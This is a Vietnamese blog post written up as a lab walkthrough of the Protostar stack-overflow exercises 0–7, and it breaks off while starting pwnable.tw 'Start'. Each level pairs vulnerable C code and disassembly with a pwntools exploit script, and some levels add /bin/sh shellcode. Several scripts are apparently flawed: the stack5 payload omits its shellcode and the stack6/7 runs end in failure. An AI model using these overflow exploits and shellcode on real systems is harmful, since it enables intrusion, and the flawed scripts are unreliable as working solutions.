<!doctype html>
<html lang="en-us">
  <head>
    <title>Learn PWN - Practice:  First step  // DatNLQ</title>
    <link rel="shortcut icon" href="/favicon.ico" />
    <meta charset="utf-8" />
    <meta name="generator" content="Hugo 0.88.1" />
    <meta name="viewport" content="width=device-width, initial-scale=1" />
    <meta name="author" content="DatNLQ" />
    <meta name="description" content="" />
    <link rel="stylesheet" href="https://datnlq.github.io/css/main.min.4a7ec8660f9a44b08c4da97c5f2e31b1192df1d4d0322e65c0dbbc6ecb1b863f.css" />

    
    <meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="Learn PWN - Practice:  First step "/>
<meta name="twitter:description" content="How did I come into contact with pwn ? In random day in random year ago, i feel like it&rsquo;s fun to pwn, so &hellip;. i tried it like this.
PROTOSTAR EXPLOIT EXERCISE Stack 0 Hãy cùng mở đầu với stackz3r0 nào các bạn ! Đề bài đã cung cấp cho chúng ta code C nên mọi thứ sẽ dễ hình dung hơn là mã ASM tuy nhiên chúng ta sẽ phân tích cả 2 nhé!"/>

    <meta property="og:title" content="Learn PWN - Practice:  First step " />
<meta property="og:description" content="How did I come into contact with pwn ? In random day in random year ago, i feel like it&rsquo;s fun to pwn, so &hellip;. i tried it like this.
PROTOSTAR EXPLOIT EXERCISE Stack 0 Hãy cùng mở đầu với stackz3r0 nào các bạn ! Đề bài đã cung cấp cho chúng ta code C nên mọi thứ sẽ dễ hình dung hơn là mã ASM tuy nhiên chúng ta sẽ phân tích cả 2 nhé!" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://datnlq.github.io/posts/protostar/" /><meta property="article:section" content="posts" />
<meta property="article:published_time" content="2021-10-22T21:43:05+07:00" />
<meta property="article:modified_time" content="2021-10-22T21:43:05+07:00" />



  </head>
  <body>
    <header class="app-header">
      <a href="https://datnlq.github.io/"><img class="app-header-avatar" src="/avatar.jpg" alt="DatNLQ" /></a>
      <h1>DatNLQ</h1>
      <p>DatNLQ&#39;s personal website</p>
      <div class="app-header-social">
        
          <a href="https://github.com/datnlq" target="_blank" rel="noreferrer noopener">
            <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-github">
  <title>My Github</title>
  <path d="M9 19c-5 1.5-5-2.5-7-3m14 6v-3.87a3.37 3.37 0 0 0-.94-2.61c3.14-.35 6.44-1.54 6.44-7A5.44 5.44 0 0 0 20 4.77 5.07 5.07 0 0 0 19.91 1S18.73.65 16 2.48a13.38 13.38 0 0 0-7 0C6.27.65 5.09 1 5.09 1A5.07 5.07 0 0 0 5 4.77a5.44 5.44 0 0 0-1.5 3.78c0 5.42 3.3 6.61 6.44 7A3.37 3.37 0 0 0 9 18.13V22"></path>
</svg>
          </a>
        
      </div>
    </header>
    <main class="app-container">
      
  <article class="post">
    <header class="post-header">
      <h1 class ="post-title">Learn PWN - Practice:  First step </h1>
      <div class="post-meta">
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-calendar">
  <title>calendar</title>
  <rect x="3" y="4" width="18" height="18" rx="2" ry="2"></rect><line x1="16" y1="2" x2="16" y2="6"></line><line x1="8" y1="2" x2="8" y2="6"></line><line x1="3" y1="10" x2="21" y2="10"></line>
</svg>
          Oct 22, 2021
        </div>
        <div>
          <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="icon icon-clock">
  <title>clock</title>
  <circle cx="12" cy="12" r="10"></circle><polyline points="12 6 12 12 16 14"></polyline>
</svg>
          25 min read
        </div>
      </div>
    </header>
    <div class="post-content">
      <h1 id="how-did-i-come-into-contact-with-pwn-">How did I come into contact with pwn ?</h1>
<p>In random day in random year ago, i feel like it&rsquo;s fun to pwn, so &hellip;. i tried it like this.</p>
<p><img src="https://github.com/datnlq/Pwn/blob/main/image/protostar.png?raw=true" alt="image"></p>
<h1 id="protostar-exploit-exercise">PROTOSTAR EXPLOIT EXERCISE</h1>
<h2 id="stack-0">Stack 0</h2>
<p>Hãy cùng mở đầu với stackz3r0 nào các bạn ! Đề bài đã cung cấp cho chúng ta code C nên mọi thứ sẽ dễ hình dung hơn là mã ASM tuy nhiên chúng ta sẽ phân tích cả 2 nhé!
Từ code C dưới đây, đề bài yêu cầu chúng ta thấy đề bài yêu cầu chúng ta thay đổi biến <em>modified</em> để in ra dòng <em>You changed the &lsquo;modified&rsquo; variable</em> :
=&gt; Nhìn từ code thì chúng ta sẽ có ý tưởng rằng nhập vào buffer bằng hàn gets và tràn sang modified.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">/*gcc -o stack0 stackzero.c -fno-stack-protector -g -z execstack */

#include&lt;stdlib.h&gt;
#include&lt;unistd.h&gt;
#include&lt;stdio.h&gt;

int main(int argc, char **argv)
{
	volatile int modified;
	char buffer[64];

	modified = 0;
	gets(buffer);

	if(modified != 0 )
		printf(&#34;You changed the &#39;modified&#39; variable \n&#34;);
	else
		printf(&#34;Try again?\n&#34;);
}
</code></pre></div><p>Mã ASM mà chúng ta disassemble từ gdb của file stack0 như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">   0x0000000000400547 &lt;+0&gt;:	push   rbp
   0x0000000000400548 &lt;+1&gt;:	mov    rbp,rsp
   0x000000000040054b &lt;+4&gt;:	sub    rsp,0x60
   0x000000000040054f &lt;+8&gt;:	mov    DWORD PTR [rbp-0x54],edi
   0x0000000000400552 &lt;+11&gt;:	mov    QWORD PTR [rbp-0x60],rsi
   0x0000000000400556 &lt;+15&gt;:	mov    DWORD PTR [rbp-0x4],0x0
   0x000000000040055d &lt;+22&gt;:	lea    rax,[rbp-0x50]
   0x0000000000400561 &lt;+26&gt;:	mov    rdi,rax
   0x0000000000400564 &lt;+29&gt;:	mov    eax,0x0
   0x0000000000400569 &lt;+34&gt;:	call   0x400450 &lt;gets@plt&gt;
   0x000000000040056e &lt;+39&gt;:	mov    eax,DWORD PTR [rbp-0x4]
   0x0000000000400571 &lt;+42&gt;:	test   eax,eax
   0x0000000000400573 &lt;+44&gt;:	je     0x400581 &lt;main+58&gt;
   0x0000000000400575 &lt;+46&gt;:	mov    edi,0x400628
   0x000000000040057a &lt;+51&gt;:	call   0x400430 &lt;puts@plt&gt;
   0x000000000040057f &lt;+56&gt;:	jmp    0x40058b &lt;main+68&gt;
   0x0000000000400581 &lt;+58&gt;:	mov    edi,0x40064d
   0x0000000000400586 &lt;+63&gt;:	call   0x400430 &lt;puts@plt&gt;
   0x000000000040058b &lt;+68&gt;:	mov    eax,0x0
   0x0000000000400590 &lt;+73&gt;:	leave  
   0x0000000000400591 &lt;+74&gt;:	ret   
</code></pre></div><p>Theo lý thuyết của buffer overflow thì chúng ta chỉ cần nhập byte vào cho tràn biến buffer và tràn sang modified là oke :&lt; Vậy thì phải xác định được vị trí và kích thước của buffer và modified.
Dựa vào mã ASM ở trên chúng ta suy ra được :
[rbp-0x50] sẽ là địa chỉ của <em>buffer</em>
[rbp-0x4] sẽ là địa chỉ của <em>modified</em>
0x50 - 0x4 = 0x4c có nghĩa chỉ cần đè &gt; 0x4c là có thể</p>
<p>Mình dùng đoạn code sau để exploit bài này!</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./stack0&#34;
DEBUG = 1

gets = 0x0000000000400588
callback = 0x0000000000400575
def exploit():
  payload = b&#34;A&#34;*0x4c + b&#34;B&#34;
  # _breakpoint = &#34;&#34;&#34;
  #     b *0x0000000000400588
  # &#34;&#34;&#34;
  # gdb.attach(io, _breakpoint)
  io.sendline(payload)
  io.recv()
  io.interactive()


io = process(BIN)
# context.log_level=&#39;debug&#39;
exploit()
</code></pre></div><div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">You changed the &#39;modified&#39; variable
</code></pre></div><h2 id="stack-1">Stack 1</h2>
<p>LevelUp++ !
Cùng check code C đề cung cấp cho chúng ta như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  if(argc == 1) {
      errx(1, &#34;please specify an argument\n&#34;);
  }

  modified = 0;
  strcpy(buffer, argv[1]);

  if(modified == 0x61626364) {
      printf(&#34;You have correctly got the variable to the right value\n&#34;);
  } else {
      printf(&#34;Try again, you got 0x%08x\n&#34;, modified);
  }
}
</code></pre></div><p>Chà chà , bài này về cơ chế cũng tương tự bài z3r0 thôi nhé ! Nhưng mà khác ở điểm phương thức nhập input sẽ khác và biến modified yêu cầu thành 1 giá trị xác định rõ ràng cụ thể là <em>modified = 0x61626364</em> và input sẽ nhập bằng argv[1] !
Cũng không có gì là quá khó vì chúng ta đã xác định được vị trí của 2 biến trên.
Có 1 điều cần lưu ý là đối với địa chỉ sẽ được ghi theo little edian, có nghĩa là byte nhỏ nhất sẽ nằm ở đầu tiền và byte lớn nhất lại nằm sau cùng ! Tuy nhiên chúng ta có hàm p64() từ thư viện pwntools sẽ giúp chúng ta phần đó
p64() là vì chương trình này chúng ta complier nó ở hệ điều hành 64 bit, còn nếu 32 bit thì dùng p32().</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./stack1&#34;
DEBUG = 1

modified = 0x61626364
payload = b&#34;A&#34;*0x4c 
payload += p64(modified)


io = process(BIN)
io.sendline(&#34;./stack1 `python -c &#39;print(payload)&#39;`&#34;)

io.interactive()
</code></pre></div><p>Và cứ thế chúng ta có được dòng :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">You have correctly got the variable to the right value
</code></pre></div><h2 id="stack-2">Stack 2</h2>
<p>LevelUp++ ! Bây giờ lại sang 1 bài khác, đề bài vẫn cho mình 1 chương trình với code C như sau:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];
  char *variable;

  variable = getenv(&#34;GREENIE&#34;);

  if(variable == NULL) {
      errx(1, &#34;please set the GREENIE environment variable\n&#34;);
  }

  modified = 0;

  strcpy(buffer, variable);

  if(modified == 0x0d0a0d0a) {
      printf(&#34;you have correctly modified the variable\n&#34;);
  } else {
      printf(&#34;Try again, you got 0x%08x\n&#34;, modified);
  }

}
</code></pre></div><p>Bài này lại xuất hiện 1 hàm rất lạ <em>variable = getenv(&ldquo;GREENIE&rdquo;)</em> , lên gg dạo chơi thử xem thì ta biết được : <a href="https://www.tutorialspoint.com/c_standard_library/c_function_getenv.htm">https://www.tutorialspoint.com/c_standard_library/c_function_getenv.htm</a>
Sau khi phân tích và tìm hiểu thì ta rút ra được kết luận là hàm getenv() đó sẽ gán giá trị của environment variable vào variable trong chương trình.
Sau đó thì lại gán biến variable vào biến buffer, nguyên lý vẫn là thế chúng ta vẫn dựa vào buffer để tràn sang modified.
Đầu tiên sẽ tạo một environment variable có tên là GREENIE nằm trong cùng đường dẫn với sourcecó gí trị như sau:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">export GREENIE=`python -c &#39;print( &#34;A&#34;*68+ &#34;\x0a\x0d\x0a\x0d&#34;)
</code></pre></div><p>Để kiểm tra xem biến GREENIE đã nhận được giá trị mình gán vào hay chưa thì chúng ta có thể dùng câu lệnh sau:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">echo $GREENIE
</code></pre></div><p>Vào sau đó chúng ta chỉ cần chạy ./stack2 thôi !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">you have correctly modified the variable
</code></pre></div><h2 id="stack-3">Stack 3</h2>
<p>LevelUp++!  Lên level này rồi thì độ khó cũng sẽ tăng theo thôi :3
Level này sẽ giúp chúng ta hình dung về flow hoạt động của chương trình !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void win()
{
  printf(&#34;code flow successfully changed\n&#34;);
}

int main(int argc, char **argv)
{
  volatile int (*fp)();
  char buffer[64];

  fp = 0;

  gets(buffer);

  if(fp) {
      printf(&#34;calling function pointer, jumping to 0x%08x\n&#34;, fp);
      fp();
  }
</code></pre></div><p>Dọc qua code C thì thấy bài yêu cầu chúng ta nhảy sang hàm <em>win</em> và in ra dòng <em>code flow successfully changed</em>
Về cơ chế thì chúng ta sẽ thay đổi flow hoạt động của chương trình, thay vì để chương trình nhập buffer rồi in ra dòng <em>calling &hellip;</em> rồi kết thúc thì chúng ta phải nhảy đến hàm <em>win</em>, điểm lưu ý tiếp theo đó là *volatile int (<em>fp)()</em> đây là 1 con trỏ hàm. Có nghĩa là chúng ta sẽ nhảy đến địa chỉ mà con trỏ này trỏ tới!
Có nghĩa là chỉ cần đè lên pointer giá trị là địa chỉ của hàm win là được!
dùng gdb để tìm ra địa chỉ của hàm <em>win= 0x4005b6</em>.</p>
<p>Tương tự như câu trên chúng ta sẽ dùng p64() để chuyển địa chỉ về little edian rồi đưa vào payload.</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./stack3&#34;
DEBUG = 1

win = 0x4005b6

def exploit():

  payload = b&#34;A&#34;*0x48 + p64(win)  
  _breakpoint = &#34;&#34;&#34;
      b *0x00000000004005ea
  &#34;&#34;&#34;
  gdb.attach(io, _breakpoint)
  io.sendline(payload)
  io.recv()
  io.interactive()


io = process(BIN)
context.log_level=&#39;debug&#39;
exploit()
</code></pre></div><div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">code flow successfully changed
</code></pre></div><h2 id="stack-4">Stack 4</h2>
<p>LevelUp++!</p>
<p>Level này mà chúng ta có kiến thức về stack khá ổn thì nó cũng sẽ ezzz thôi! Vẫn là thay đổi flow của chương trình nhưng mà theo 1 cách khác !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void win() #
{
  printf(&#34;flag{u hereeee why u have to find ???}\n&#34;);
}

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
</code></pre></div><p>Như code C thì chúng ta chỉ thấy mỗi hàm gets(buffer), vậy thì nói 1 chút về cái flow của chương trình này nhé, để cho dễ thì chúng ta sẽ phân tích mã ASM :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">   0x0000000000400577 &lt;+0&gt;:	push   rbp
   0x0000000000400578 &lt;+1&gt;:	mov    rbp,rsp
   0x000000000040057b &lt;+4&gt;:	sub    rsp,0x50
   0x000000000040057f &lt;+8&gt;:	mov    DWORD PTR [rbp-0x44],edi
   0x0000000000400582 &lt;+11&gt;:	mov    QWORD PTR [rbp-0x50],rsi
   0x0000000000400586 &lt;+15&gt;:	lea    rax,[rbp-0x40]
   0x000000000040058a &lt;+19&gt;:	mov    rdi,rax
   0x000000000040058d &lt;+22&gt;:	mov    eax,0x0
   0x0000000000400592 &lt;+27&gt;:	call   0x400450 &lt;gets@plt&gt;
   0x0000000000400597 &lt;+32&gt;:	mov    eax,0x0
   0x000000000040059c &lt;+37&gt;:	leave  
   0x000000000040059d &lt;+38&gt;:	ret    
</code></pre></div><p>Như chúng ta thấy, sau hàm get thì chúng ta sẽ có lần lượt các hàm có công dụng là trả về 0 cho eax, leave sẽ khôi phục lại stack trước khi thực thi hàm này, cụ thể là trả về giá trị cũ về rbp và rsp sau đó ret sẽ nhảy về địa chỉ trên đỉnh stack!</p>
<p>Điều đó có nghĩa là chúng ta sẽ cần đến 0x40 bytes để đè hết buffer, 0x8 bytes để đè old ebp ( cần 0x8 bytes bởi vì 64bit, 0x4 bytes với 32 bit), tiếp theo là địa chỉ hàm win, hàm mà chúng ta sẽ nhảy về!</p>
<p>Dựa vào đó chúng ta có exploit như sau !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./stack4&#34;
DEBUG = 1

win = 0x400566

def exploit():

  payload = b&#34;A&#34;*0x48 + p64(win)
  
  _breakpoint = &#34;&#34;&#34;
      b *0x0000000000400592
  &#34;&#34;&#34;
  gdb.attach(io, _breakpoint)
  io.sendline(payload)
  io.recv()
  io.interactive()


io = process(BIN)
context.log_level=&#39;debug&#39;
exploit()
</code></pre></div><p>Flow của chương trình đã bị thay đổi !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">flag{u hereeee why u have to find ???}
</code></pre></div><h2 id="stack5">Stack5</h2>
<p>(((LevelUp++)++)++) !
Mình phải up như thế vì mình bị dừng ở phần này khá lâu ! Mình không biết tại sao mình lại bị dừng lại ở bài này lâu đến thế ! Chắc tại vì shellcode 😄</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
</code></pre></div><p>Code C này rất đơn thuần, chỉ có buffer và gets 🦀 ! Điều đó có nghĩa là chúng ta phải tìm ra 1 hướng mới!</p>
<p>Như là Shellcode thần chưởng [1- Nhập môn],[2- Luyện Asm]
Các bạn hãy lên mạng search đọc nhé !</p>
<p>Sau cùng sau khi tìm hiểu thì flow hoạt động của shellcode như sau: Bạn cần ghi shellcode vào 1 địa chỉ nào đó sau đó return về đúng địa chỉ của shellcode thì đoạn shellcode đó sẽ được thực thi :vvvv</p>
<p>Nhìn về bài này có nghĩa là phải gọi 1 lệnh trùm ở system đó là <em>&quot;/bin/sh&quot;</em> thay vì ngồi code ASM lệnh này thì chúng ta có thể lên <a href="http://shell-storm.org/shellcode/">Shellstorm</a> để chọn đoạn shellcode tương ứng với hệ điều hành mà mình đang dùng !</p>
<p>từ đó chúng ta có shellcode = b&quot;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80&quot;</p>
<p>Từ đó viết ra 1 file exploit như sau :</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import *

BIN = &#34;./stack5&#34;
DEBUG = 1

buf = 0x7fffffffde10
shellcode = b&#34;\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80&#34;

#\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80

def exploit():

  payload = b&#34;A&#34;*(0x48-len(shellcode)) + p64(buf)
  
  _breakpoint = &#34;&#34;&#34;
      b *0x0000000000400522
  &#34;&#34;&#34;
  gdb.attach(io, _breakpoint)
  io.sendline(payload)
  io.recv()
  io.interactive()


io = process(BIN)
context.log_level=&#39;debug&#39;
exploit()
</code></pre></div><p>Boommmm</p>
<h2 id="stack-6">Stack 6</h2>
<p>LevelUp++!
Lên tới level này rồi thì có nghĩa là độ khó đã ghê lắm rồi :&lt;  Nên sẽ có cái mới cho các bạn tìm hiểu ở phần code C của chương trình. 😆😆😆😆</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

void getpath()
{
  char buffer[64];
  unsigned int ret;

  printf(&#34;input path please: &#34;); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret &amp; 0xbf000000) == 0xbf000000) {
    printf(&#34;bzzzt (%p)\n&#34;, ret);
    _exit(1);
  }

  printf(&#34;got path %s\n&#34;, buffer);
}

int main(int argc, char **argv)
{
  getpath();
}
</code></pre></div><p>Bài này thì lại xuất hiện 1 hàm mới đó là <em><code>__builtin_return_address(0)</code></em> lại dạo chơi trên gg xem chúng ta gặp cái gì đây nó thì ra lại hàm 1 hàm <a href="https://gcc.gnu.org/onlinedocs/gcc/Return-Address.html">return address</a>.  Hàm này đơn giản chỉ là trả về giá trị trở về của chương trình ứng với lớp được truyền vào.</p>
<p>Trong trường hợp này, hàm này sẽ trả về giá trị trở về của getpath và gán nó vào biến ret . Và bài yêu cầu chúng ta phải gán được <em>ret = 0xbf000000</em> điều đó có nghĩa là hàm getpath phải trả về giá trị 0xbf000000</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">   0x0000000000400617 &lt;+0&gt;:	push   rbp
   0x0000000000400618 &lt;+1&gt;:	mov    rbp,rsp
   0x000000000040061b &lt;+4&gt;:	sub    rsp,0x50
   0x000000000040061f &lt;+8&gt;:	mov    edi,0x400744
   0x0000000000400624 &lt;+13&gt;:	mov    eax,0x0
   0x0000000000400629 &lt;+18&gt;:	call   0x4004f0 &lt;printf@plt&gt;
   0x000000000040062e &lt;+23&gt;:	mov    rax,QWORD PTR [rip+0x200a1b]        # 0x601050 &lt;stdout@@GLIBC_2.2.5&gt;
   0x0000000000400635 &lt;+30&gt;:	mov    rdi,rax
   0x0000000000400638 &lt;+33&gt;:	call   0x400520 &lt;fflush@plt&gt;
   0x000000000040063d &lt;+38&gt;:	lea    rax,[rbp-0x50]
   0x0000000000400641 &lt;+42&gt;:	mov    rdi,rax
   0x0000000000400644 &lt;+45&gt;:	mov    eax,0x0
   0x0000000000400649 &lt;+50&gt;:	call   0x400510 &lt;gets@plt&gt;
   0x000000000040064e &lt;+55&gt;:	mov    rax,QWORD PTR [rbp+0x8]
   0x0000000000400652 &lt;+59&gt;:	mov    DWORD PTR [rbp-0x4],eax
   0x0000000000400655 &lt;+62&gt;:	mov    eax,DWORD PTR [rbp-0x4]
   0x0000000000400658 &lt;+65&gt;:	and    eax,0xbf000000
   0x000000000040065d &lt;+70&gt;:	cmp    eax,0xbf000000
   0x0000000000400662 &lt;+75&gt;:	jne    0x400682 &lt;getpath+107&gt;
   0x0000000000400664 &lt;+77&gt;:	mov    eax,DWORD PTR [rbp-0x4]
   0x0000000000400667 &lt;+80&gt;:	mov    esi,eax
   0x0000000000400669 &lt;+82&gt;:	mov    edi,0x400758
   0x000000000040066e &lt;+87&gt;:	mov    eax,0x0
   0x0000000000400673 &lt;+92&gt;:	call   0x4004f0 &lt;printf@plt&gt;
   0x0000000000400678 &lt;+97&gt;:	mov    edi,0x1
   0x000000000040067d &lt;+102&gt;:	call   0x4004e0 &lt;_exit@plt&gt;
   0x0000000000400682 &lt;+107&gt;:	lea    rax,[rbp-0x50]
   0x0000000000400686 &lt;+111&gt;:	mov    rsi,rax
   0x0000000000400689 &lt;+114&gt;:	mov    edi,0x400764
   0x000000000040068e &lt;+119&gt;:	mov    eax,0x0
   0x0000000000400693 &lt;+124&gt;:	call   0x4004f0 &lt;printf@plt&gt;
   0x0000000000400698 &lt;+129&gt;:	nop
   0x0000000000400699 &lt;+130&gt;:	leave  
   0x000000000040069a &lt;+131&gt;:	ret    
</code></pre></div><p>Dựa vào code ASM thì chúng ta thấy buffer ở vị trí [rbp-0x50] có nghĩa là chúng ta sẽ dùng 0x50 bytes để đè lên buffer và ret , sau đó là 0x8 bytes để đè lên old rbp và sau đó sẽ là giá trị mà chúng ta nhảy về là ret.</p>
<p>Mình viết một payload như sau:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import* 

BIN = &#34;./stack6&#34;
DEBUG = 1 

ret = 0xbf000000

def exploit():
	payload = b&#34;A&#34;*0x50 + b&#34;B&#34;*0x8 + p64(ret)

	_breakpoint = &#34;&#34;&#34;
		0x0000000000400649
	&#34;&#34;&#34;
	gdb.attach(io,_breakpoint)
	io.sendline(payload)
	io.recv()
	io.interactive()


io = process(BIN)
context.log_level = &#39;debug&#39;

exploit()
</code></pre></div><div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">bzzzt (0xbf000000)
</code></pre></div><h2 id="stack-7">Stack 7</h2>
<p>LevelUp++!</p>
<p>Thậc là tuyệt vời ! 😆😆😆😆😆 đây là level cuối cùng trong chuỗi chall này rồi! Nên là chiến thôii</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
#include &lt;stdio.h&gt;
#include &lt;string.h&gt;

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf(&#34;input path please: &#34;); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret &amp; 0xb0000000) == 0xb0000000) {
      printf(&#34;bzzzt (%p)\n&#34;, ret);
      _exit(1);
  }

  printf(&#34;got path %s\n&#34;, buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();
}
</code></pre></div><p>Bài này không khác gì bài stack 6 cho lắm chỉ xuất hiện thêm hàm <em>strdup(buffer)</em> , nên là đi search gg lẹ lẹ ! Hàm <a href="https://www.geeksforgeeks.org/strdup-strdndup-functions-c/">strdup</a> thực ra không ảnh hưởng gì lớn về việc exploit của mình! Nên là các bạn sẽ tự đọc thêm đi nhé bài này không có gì khó khăn, mình sẽ dùng luôn payload của bài stack 6 nhé !</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">from pwn import* 

BIN = &#34;./stack7&#34;
DEBUG = 1 

ret = 0xbf000000

def exploit():
	payload = b&#34;A&#34;*0x50 + b&#34;B&#34;*0x8 + p64(ret)

	_breakpoint = &#34;&#34;&#34;
		0x0000000000400699
	&#34;&#34;&#34;
	gdb.attach(io,_breakpoint)
	io.sendline(payload)
	io.recv()
	io.interactive()


io = process(BIN)
context.log_level = &#39;debug&#39;

exploit()

</code></pre></div><p>Done !</p>
<h1 id="pwnabletw">PWNABLE.TW</h1>
<h2 id="start">Start</h2>
<p>Đề bài cung cấp cho chúng ta 1 file chương trình trên Linux, vì vậy để biết thì chúng ta phải xem thử xem nó làm cái gì nào!
&hellip;..
Sau khi chạy thì thấy rằng chương trình in ra dòng <em>Let&rsquo;s start the CTF:</em> sau đó get chuỗi chúng ta nhập vào bằng cách nào đó, để biết được cấu trúc chương trình thì chúng ta dùng gdb để disassemble chương trình ra và được hàm _start:</p>
<div class="highlight"><pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-fallback" data-lang="fallback">   0x08048060 &lt;+0&gt;:	push   esp
   0x08048061 &lt;+1&gt;:	push   0x804809d
   0x08048066 &lt;+6&gt;:	xor    eax,eax
   0x08048068 &lt;+8&gt;:	xor    ebx,ebx
   0x0804806a &lt;+10&gt;:	xor    ecx,ecx
   0x0804806c &lt;+12&gt;:	xor    edx,edx
   0x0804806e &lt;+14&gt;:	push   0x3a465443
   0x08048073 &lt;+19&gt;:	push   0x20656874
   0x08048078 &lt;+24&gt;:	push   0x20747261
   0x0804807d &lt;+29&gt;:	push   0x74732073
   0x08048082 &lt;+34&gt;:	push   0x2774654c
   0x08048087 &lt;+39&gt;:	mov    ecx,esp
   0x08048089 &lt;+41&gt;:	mov    dl,0x14
